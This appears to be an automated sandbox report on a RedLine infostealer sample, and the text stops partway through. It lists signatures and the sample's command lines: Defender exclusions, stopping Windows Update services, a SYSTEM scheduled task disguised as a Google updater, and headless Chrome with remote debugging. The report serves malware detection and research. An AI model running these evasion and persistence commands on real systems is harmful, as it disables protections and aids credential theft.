Malware Analysis Report

2025-01-18 08:19

Sample ID 230810-w4c4xsab5v
Target 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp
SHA256 64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c

Threat Level: Known bad

The file 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Redline family

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:28

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:28

Reported

2023-08-10 18:30

Platform

win7-20230712-en

Max time kernel

106s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2232 set thread context of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1704 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1704 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1704 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1912 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1912 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1912 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1912 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1704 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1704 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1704 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1704 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2232 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2232 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2232 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2232 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2880 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 3044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 3044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 3044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2880 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1284 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1284 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3052 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3052 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3052 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2132 wrote to memory of 1728 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2132 wrote to memory of 1728 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2132 wrote to memory of 1728 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2176 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2176 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {B6EBE1CB-343F-4BF2-BE46-D5B5F119025A} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=12555 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5bc9758,0x7fef5bc9768,0x7fef5bc9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=820 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1192 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=12555 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1492 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1944 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

